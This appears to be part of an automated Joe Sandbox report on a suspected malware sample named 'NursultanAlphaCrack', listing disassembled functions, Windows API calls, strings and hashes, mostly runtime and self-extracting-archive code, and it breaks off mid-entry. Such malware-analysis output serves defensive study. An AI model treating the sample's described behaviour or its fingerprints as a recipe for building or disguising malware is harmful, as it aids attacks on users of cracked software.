SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 001D1274
SystemTimeToFileTime.KERNEL32(?,?), ref: 001D1284
SystemTimeToFileTime.KERNEL32(?,?), ref: 001D1294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 001D12CF
__aullrem.LIBCMT ref: 001D1379

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 97c58f88878647e37397f82ed2da0ff59f1029c3483aefe7fbfb856e5fb123c3
Instruction ID: 4c6b702c7f1a8f9e2a986a6e2ebd1c684eff9b8e488756674dd6ea95b988c458
Opcode Fuzzy Hash: 97c58f88878647e37397f82ed2da0ff59f1029c3483aefe7fbfb856e5fb123c3
Instruction Fuzzy Hash: 2041F5B2508305AFC710DF65C88496BFBE9FF88714F14892EF59AC2610E734E649CB52

Function 001C2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 001C2536

Part of subcall function 001C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C40A5

Part of subcall function 001D05DA: _wcslen.LIBCMT ref: 001D05E0

Strings

x%u, xrefs: 001C26FD
;%u, xrefs: 001C2523
xc%u, xrefs: 001C275A

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 8bee50d37da4257b3d700d3706946796f100aa975451be57f6efd9835f15583a
Instruction ID: 7f729bf0a1c91ce104885a1102b74ac5fd717672b9fbd33c8b56679dbc9e339b
Opcode Fuzzy Hash: 8bee50d37da4257b3d700d3706946796f100aa975451be57f6efd9835f15583a
Instruction Fuzzy Hash: 28F1F5706083819BDB25EB2884A5FFE77D56BB4300F08056DED8A9B283CB74DD45C7A6

Function 001D9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001D9D0A

Strings

<br>, xrefs: 001D9DFE
</style>, xrefs: 001D9E52
</p>, xrefs: 001D9DE8
<style>, xrefs: 001D9E30
>, xrefs: 001D9D4B

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: fcbd1aafbfec6e0380b4f964687a894977e829515dd0a9aa3df2710350733075
Instruction ID: 4dd631fd2ffe2ad311c98b9deb225803dab517e052aa902f2ec36d6b8e266dd0
Opcode Fuzzy Hash: fcbd1aafbfec6e0380b4f964687a894977e829515dd0a9aa3df2710350733075
Instruction Fuzzy Hash: AC512966740763A5DB309AA99C1177773E2DFA5750F69042BFDC1CB3C0FB658C818261

Function 001EF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,001EFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 001EF6CF
__fassign.LIBCMT ref: 001EF74A
__fassign.LIBCMT ref: 001EF765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 001EF78B
WriteFile.KERNEL32(?,00000000,00000000,001EFE02,00000000,?,?,?,?,?,?,?,?,?,001EFE02,00000000), ref: 001EF7AA
WriteFile.KERNEL32(?,00000000,00000001,001EFE02,00000000,?,?,?,?,?,?,?,?,?,001EFE02,00000000), ref: 001EF7E3

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 4bd33dccc291c326ad90d0a408ded8dc21116499dcfd9e23e312939940867caa
Instruction ID: eaab18de7bf107e5fe466761b965602fb271cbcefaeaffc16a3ca5466f947a40
Opcode Fuzzy Hash: 4bd33dccc291c326ad90d0a408ded8dc21116499dcfd9e23e312939940867caa
Instruction Fuzzy Hash: AB51C5B5D00649AFDB10CFA9DC55AEEBBF4EF08700F14416EE955E7251D730AA41CBA0

Function 001E2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 001E2937
___except_validate_context_record.LIBVCRUNTIME ref: 001E293F
_ValidateLocalCookies.LIBCMT ref: 001E29C8
__IsNonwritableInCurrentImage.LIBCMT ref: 001E29F3
_ValidateLocalCookies.LIBCMT ref: 001E2A48

Strings

csm, xrefs: 001E29DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 398d70fc80a67ef9359e75d6aa61b3d14898c8356e8fec8a31785793c61abf9a
Instruction ID: 69cff47a88a61fe31a3fbf146c820ff3797cb9a515b4746c4bd7658f2688c849
Opcode Fuzzy Hash: 398d70fc80a67ef9359e75d6aa61b3d14898c8356e8fec8a31785793c61abf9a
Instruction Fuzzy Hash: F6411B30A006989FCF14DF6AC895AAE7BF9EF44318F148065E8159B393C771DA41CF91

Function 001D9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 001D9EEE
GetWindowRect.USER32(?,00000000), ref: 001D9F44
ShowWindow.USER32(?,00000005,00000000), ref: 001D9FDB
SetWindowTextW.USER32(?,00000000), ref: 001D9FE3
ShowWindow.USER32(00000000,00000005), ref: 001D9FF9

Strings

RarHtmlClassName, xrefs: 001D9FA5

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 16c215892be61248e6095557a0f2e37166750d4a57e4fa67ae5d8bf7b5360b49
Instruction ID: d7382cdf434c7cb615749fdb3d1f2f8828613079955d6cdea89b9ec10493e543
Opcode Fuzzy Hash: 16c215892be61248e6095557a0f2e37166750d4a57e4fa67ae5d8bf7b5360b49
Instruction Fuzzy Hash: 1B41C032004210BFDB219FA4EC4CB2B7FA8FF48701F00455AF949AA266DB38D919CF65

Function 001D9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001D995E
_wcslen.LIBCMT ref: 001D9993

Strings

, xrefs: 001D99B0
<br>, xrefs: 001D99DF
 , xrefs: 001D9A21
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 001D9987

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 3acd1f12c111d3e119a0b3b7f6b695b9d4423e616986e3125c697def43f119bf
Instruction ID: b1d09ab30d1682dc41d1a84b2bde960b7de88d19fd7f6962c071ad0b27365ed2
Opcode Fuzzy Hash: 3acd1f12c111d3e119a0b3b7f6b695b9d4423e616986e3125c697def43f119bf
Instruction Fuzzy Hash: 60319E7364475566DA34AF959C42B7F73E4EBA0720F60841FF996873C0FBA0AD4183A1

Function 001EC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001EC868: _free.LIBCMT ref: 001EC891

_free.LIBCMT ref: 001EC8F2

Part of subcall function 001E8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,001EC896,001F3A34,00000000,001F3A34,00000000,?,001EC8BD,001F3A34,00000007,001F3A34,?,001ECCBA,001F3A34), ref: 001E8DE2
Part of subcall function 001E8DCC: GetLastError.KERNEL32(001F3A34,?,001EC896,001F3A34,00000000,001F3A34,00000000,?,001EC8BD,001F3A34,00000007,001F3A34,?,001ECCBA,001F3A34,001F3A34), ref: 001E8DF4

_free.LIBCMT ref: 001EC8FD
_free.LIBCMT ref: 001EC908
_free.LIBCMT ref: 001EC95C
_free.LIBCMT ref: 001EC967
_free.LIBCMT ref: 001EC972
_free.LIBCMT ref: 001EC97D

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: 8d9e75780ef0033f2ae2d600ba0cea8979e9494afc2c6f04e270f62f9326865c
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: 42112171580F84AAE520B7B3CD07FCF7BACAF24B00F444C15B29D66092DB75B5068790

Function 001DE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,001DE669,001DE5CC,001DE86D), ref: 001DE605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 001DE61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 001DE630

Strings

KERNEL32.DLL, xrefs: 001DE600
AcquireSRWLockExclusive, xrefs: 001DE615
ReleaseSRWLockExclusive, xrefs: 001DE625

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 82b597fdcc65f910713df66573280566baba547b658171f91dff71209bb2209f
Instruction ID: 38ced9efe11c5406813955f9704c869997aedf02e5b973ce145544de55c1673f
Opcode Fuzzy Hash: 82b597fdcc65f910713df66573280566baba547b658171f91dff71209bb2209f
Instruction Fuzzy Hash: D8F0F6357812226B4F316FB46C8897622C96A35753B05053BFA06DF710EB10CC659B91

Function 001D146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 001D14C2

Part of subcall function 001CB146: GetVersionExW.KERNEL32(?), ref: 001CB16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001D14E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 001D1500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 001D1513
SystemTimeToFileTime.KERNEL32(?,?), ref: 001D1523
SystemTimeToFileTime.KERNEL32(?,?), ref: 001D1533

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: f5616322f12a4c294a35480f8e0933c9f15896fb7ea483d05254814724eaf065
Instruction ID: c59db92765a5f7d973277ac81efc7974e25fc62d6fcab5c76a0c59ba6a608dbc
Opcode Fuzzy Hash: f5616322f12a4c294a35480f8e0933c9f15896fb7ea483d05254814724eaf065
Instruction Fuzzy Hash: 7331E875208345ABC704DFA8D8849ABB7F8FF98714F044A1EF999C3610E734D549CBA6

Function 001E2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,001E2AF1,001E02FC,001DFA34), ref: 001E2B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001E2B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001E2B2F
SetLastError.KERNEL32(00000000,001E2AF1,001E02FC,001DFA34), ref: 001E2B81

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 0846097985d2ffb77a91f22826a2f216d30a9fc24f53794b0cdb562bf951505c
Instruction ID: e87dcb0ee584459275cbc13c61d4c21df6764a7cc520caa84d2c5e46be2fe675
Opcode Fuzzy Hash: 0846097985d2ffb77a91f22826a2f216d30a9fc24f53794b0cdb562bf951505c
Instruction Fuzzy Hash: 4A012833108F516DA6282BB77C6993E7B8EEB217B4760033AF420564F0EFA25C40D244

Function 001E97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00201030,001E4674,00201030,?,?,001E3F73,00000050,?,00201030,00000200), ref: 001E97E9
_free.LIBCMT ref: 001E981C
_free.LIBCMT ref: 001E9844
SetLastError.KERNEL32(00000000,?,00201030,00000200), ref: 001E9851
SetLastError.KERNEL32(00000000,?,00201030,00000200), ref: 001E985D
_abort.LIBCMT ref: 001E9863

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 95acf519411db3c84098ca7f749bd42220a5673708d97784008d7ba48baad5af
Instruction ID: 6ad44bcb8d692db077e04a0f5d4fe50edaac0275a51bab1821823bfbfda95aa8
Opcode Fuzzy Hash: 95acf519411db3c84098ca7f749bd42220a5673708d97784008d7ba48baad5af
Instruction Fuzzy Hash: 68F02835100E85A6C71233777C0AE2F2A659FE2B70F250124F528925F2FF2088028165

Function 001DDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 001DDC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001DDC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001DDC72
TranslateMessage.USER32(?), ref: 001DDC7C
DispatchMessageW.USER32(?), ref: 001DDC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 001DDC91

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 54d249452710d66c25785fb19912e80114fc99ac288230df20619c6f46196319
Instruction ID: 92c90d890fd5d09edc862899e52f0a296e9068fdd3aa186417987fcabe479b0a
Opcode Fuzzy Hash: 54d249452710d66c25785fb19912e80114fc99ac288230df20619c6f46196319
Instruction Fuzzy Hash: CEF03C72A01219BBCB20ABE5EC4DDDB7F7DEF41791F004012B50AD2050D6799686CBB0

Function 001CC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 001D05DA: _wcslen.LIBCMT ref: 001D05E0

Part of subcall function 001CB92D: _wcsrchr.LIBVCRUNTIME ref: 001CB944

_wcslen.LIBCMT ref: 001CC197
_wcslen.LIBCMT ref: 001CC1DF

Strings

.exe, xrefs: 001CC10B
.rar, xrefs: 001CC0E1, 001CC134
.sfx, xrefs: 001CC11A

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: a2ffee8b0293d734ee2f53da7549d5366c29a106c7796926310a38c7d1325c91
Instruction ID: 6fc2a0c26af279155cd3f0b5bd2b235a7b9087a49bd2f642014e69c3046004d0
Opcode Fuzzy Hash: a2ffee8b0293d734ee2f53da7549d5366c29a106c7796926310a38c7d1325c91
Instruction Fuzzy Hash: FE412526500362E5C736AF748852F7EB3A8EF74754F18094EF999AB181EB60CD91C3D1

Function 001DCE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 001DCE9D

Part of subcall function 001CB690: _wcslen.LIBCMT ref: 001CB696

_swprintf.LIBCMT ref: 001DCED1

Part of subcall function 001C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C40A5

SetDlgItemTextW.USER32(?,00000066,0020946A), ref: 001DCEF1
EndDialog.USER32(?,00000001), ref: 001DCFFE

Strings

%s%s%u, xrefs: 001DCEC6

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: a59f364404bfe690ef5cfe701b805afc84d408a1cf9ca65f566a8c61404efa97
Instruction ID: c9ca8a701b57eaa7b3c6e7dad3c593572612a0c51583dd402318302b9a3001b8
Opcode Fuzzy Hash: a59f364404bfe690ef5cfe701b805afc84d408a1cf9ca65f566a8c61404efa97
Instruction Fuzzy Hash: A14182B1900259AADF25DB94DC45FEA77BCEB15300F4084A7F909E7141EB709A84CFA1

Function 001CBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001CBB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,001CA275,?,?,00000800,?,001CA23A,?,001C755C), ref: 001CBBC5
_wcslen.LIBCMT ref: 001CBC3B

Strings

UNC, xrefs: 001CBBA7
\\?\, xrefs: 001CBB52, 001CBB99, 001CBBF7, 001CBC4E

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
